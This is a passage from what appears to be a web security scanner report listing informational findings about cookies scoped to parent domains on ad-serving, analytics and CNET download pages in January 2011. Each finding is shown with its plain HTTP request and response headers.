Server: GFE/2.0
Expires: Tue, 11 Jan 2011 13:27:09 GMT

GIF89a.............!.......,...........L..;

10.6. http://ad.doubleclick.net/adj/wiredcom.dart/threatlevel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/wiredcom.dart/threatlevel

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c6fb6ac310000bc||t=1294802606|et=730|cs=8ndnuyeg; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:23:26 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:23:26 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adj/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 844
Set-Cookie: id=c6fb6ac310000bc||t=1294802606|et=730|cs=8ndnuyeg; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:23:26 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:23:26 GMT
Cache-Control: no-cache
Pragma: no-cache
Date: Wed, 12 Jan 2011 03:23:26 GMT
Expires: Wed, 12 Jan 2011 03:23:26 GMT
Connection: close

document.write('\n');

var projectid = 2621;
var playerwidth = 300;
var playerheight = 250;
//var clickurl = "http://ad.doubleclick.net/click%3Bh%3Dv8/3a8d/3/0/%2a/b%3B2347
...[SNIP]...

10.7. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

id=c4ebaac31000066||t=1294802685|et=730|cs=3l8s5eo3; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:24:45 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:24:45 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clk;233079667;13533154;h?http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://info.isilon.com/forms/simpleissmart?source=uk_register_text_simpleissmart
Set-Cookie: id=c4ebaac31000066||t=1294802685|et=730|cs=3l8s5eo3; path=/; domain=.doubleclick.net; expires=Fri, 11 Jan 2013 03:24:45 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Set-Cookie: test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 11 Jan 2011 03:24:45 GMT
Date: Wed, 12 Jan 2011 03:24:45 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

10.8. http://ad.doubleclick.net/jump/wiredcom.dart/threatlevel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/jump/wiredcom.dart/threatlevel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

id=c9e66a33100004f|1873234/1044713/14986|t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /jump/wiredcom.dart/threatlevel HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c9e66a33100004f||t=1294752429|et=730|cs=d5sqmcrv; L1527=1.1294622737145; test_cookie=CheckForPermission;

Response

HTTP/1.1 302 Moved Temporarily
Content-Length: 0
Location: http://www.intel.com/consumer/products/processors/corei5.htm?dfaid=1&crtvid=39900309
Set-Cookie: id=c9e66a33100004f|1873234/1044713/14986|t=1294752429|et=730|cs=d5sqmcrv; path=/; domain=.doubleclick.net; expires=Thu, 10 Jan 2013 13:27:09 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Wed, 12 Jan 2011 03:23:22 GMT
Server: GFE/2.0
Content-Type: text/html
Connection: close

10.9. http://ad.insightexpressai.com/adserver/adServer.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.insightexpressai.com
Path:	/adserver/adServer.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

IXAIBanners2203=170474; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/adServer.aspx?publisherID=338 HTTP/1.1
Host: ad.insightexpressai.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Expires: Wed, 12 Jan 2011 03:04:01 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
Set-Cookie: IXAICampaignCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIControlCounter2203=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBannerCounter170474=0; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
Set-Cookie: IXAIBanners2203=170474; domain=.insightexpressai.com; expires=Tue, 12-Jan-2016 03:04:02 GMT; path=/
P3P: CP="OTI DSP COR CUR ADMi DEVi TAI PSA PSD IVD CONi TELi OUR BUS STA"
Date: Wed, 12 Jan 2011 03:04:02 GMT
Connection: close
Content-Length: 9

//170474

10.10. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 11-Jan-2013 03:00:25 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b?c1=2&c2=3000023&rn=2127270684&c7=http%3A%2F%2Fdownload.cnet.com%2F8301-2007_4-20027809-12.html%3Ftag%3Dmncol%3Btitle&c8=Android%20lands%20cloud%20security%20from%20Trend%20Micro%20%7C%&c9=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html&cv=2.2&cs=js HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://download.cnet.com/8301-2007_4-20027809-12.html?tag=mncol;title
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 204 No Content
Content-Length: 0
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Set-Cookie: UID=1f00d615-24.143.206.88-1294170954; expires=Fri, 11-Jan-2013 03:00:25 GMT; path=/; domain=.scorecardresearch.com
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC"
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Pragma: no-cache
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
Server: CS

10.11. http://bs.serving-sys.com/BurstingPipe/BannerRedirect.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerRedirect.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

E2=0a+re3wUsI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerRedirect.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://www.pctools.com/spyware-doctor-antivirus/?ref=display-cnet&utm_source=download.com&utm_medium=banner&utm_content=all&utm_campaign=US_SECTARG_sdav_300_03_11-09
Server: Microsoft-IIS/7.5
Set-Cookie: E2=0a+re3wUsI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:16:53 GMT
Connection: close

10.12. http://bs.serving-sys.com/BurstingPipe/BannerSource.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BannerSource.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A2=fU+La5OV0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=0a+rg410sI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BannerSource.asp?FlightID=1901699&Page=&PluID=0&EyeblasterID=4165551&Pos=000000087871816&ord=[timestamp] HTTP/1.1
Host: bs.serving-sys.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=; B2=; u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G7030; E2=0a+r820wsG02WG820wsG09MY8y8ysF; C3=; u3=1; D3=;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Length: 0
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Location: http://ds.serving-sys.com/BurstingRes/Site-27742/Type-0/f4bbb00d-1a47-45b5-bf52-f968c23d96e3.jpg
Server: Microsoft-IIS/7.5
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=fU+La5OV0a+r0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7gi30820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uO9820wsI0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uO9002P820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+rg410sI02WG820wsG09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=32bb5b9c-1f08-4807-9e06-c4a4f0827c613G703g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C_000000087871816=4165551
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:17:26 GMT
Connection: close

10.13. http://bs.serving-sys.com/BurstingPipe/BurstingInteractionsPipe.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/BurstingInteractionsPipe.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

u2=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/BurstingInteractionsPipe.asp?interactionsStr=4164202%7E%7E0%5EebAdDuration%7E18%7E0%7E1%7E0%7E2%7E0%7E0%5EebRichFlashPlayed%7E0%7E0%7E1%7E0%7E2%7E0%7E0&OptOut=0&ebRandom=0.9409657982178032&flv=10.1103&wmpv=0&res=128 HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Origin: http://www.theregister.co.uk
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=f7d1a9e2-ffff-4620-9a6f-d4ba2248bf353G9020; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:24 GMT
Connection: close
Content-Length: 0

10.14. http://bs.serving-sys.com/BurstingPipe/adServer.bs previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bs.serving-sys.com
Path:	/BurstingPipe/adServer.bs

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=1922091&PluID=0&w=300&h=600&ord=3092481&ncu=http://ad.uk.doubleclick.net/click%3Bh%3Dv8/3a8a/3/0/%2a/f%3B232232804%3B0-0%3B1%3B13500656%3B4252-336/280%3B39182405/39200192/1%3B%3B%7Esscs%3D%3f HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.theregister.co.uk/2011/01/07/open_source_crypto_curbs/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsG; B2=83xP08y8ysF7gi30820wsG; C3=0u3F8y8ysF0000040_0uO9820wsG0000002_; D3=0u3F00358y8ysF0uO9002P820wsG; E2=0a+r820wsG09MY8y8ysF; u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; u3=1

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=&FLV=10.1103&RES=128&WMPV=0; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A2=gn3Ka4JO09MY00008y8ysFfU+La50V0a+r0000820wsGfUFGa5OE02WG0000820wsI; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B2=7lgH0820wsI83xP08y8ysF7gi30820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: C3=0uP4820wsI000w000_0u3F8y8ysF0000040_0uO9820wsG0000002_; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: D3=0uP402HA820wsI0u3F00358y8ysF0uO9002P820wsG; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: E2=0a+r820wsG02WG820wsI09MY8y8ysF; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u3=1; expires=Thu, 31-Dec-2037 22:00:00 GMT; domain=.serving-sys.com; path=/
Set-Cookie: U=1b39b065-3668-4ab4-a4dc-a28fe9442aaf3G601g; expires=Thu, 17-Apr-2010 22:00:00 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 12 Jan 2011 03:00:25 GMT
Connection: close
Content-Length: 2868

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

10.15. http://download.cnet.com/1770-20_4-0.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/1770-20_4-0.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
arrowLat=1294837274322; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /1770-20_4-0.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

10.16. http://download.cnet.com/8300-2007_4-12.xml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8300-2007_4-12.xml

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
arrowLat=1294837275148; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8300-2007_4-12.xml HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:14 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app5.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:20 GMT
Edge-Control: max-age=360
Age: 115
Content-Type: text/xml;charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:14 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowLat=1294837275148; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:14 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:14 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:14 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:19 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:14 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Cache-Control: max-age=360
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 55525

<?xml version="1.0" encoding="UTF-8"?>



<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/">
<channel>
<link>http://download.cnet
...[SNIP]...

10.17. http://download.cnet.com/8301-2007_4-20015771-12.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://download.cnet.com
Path:	/8301-2007_4-20015771-12.html

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:19 GMT
arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
arrowLat=1294837280385; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:19 GMT
arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:19 GMT
arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT
arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:19 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /8301-2007_4-20015771-12.html HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
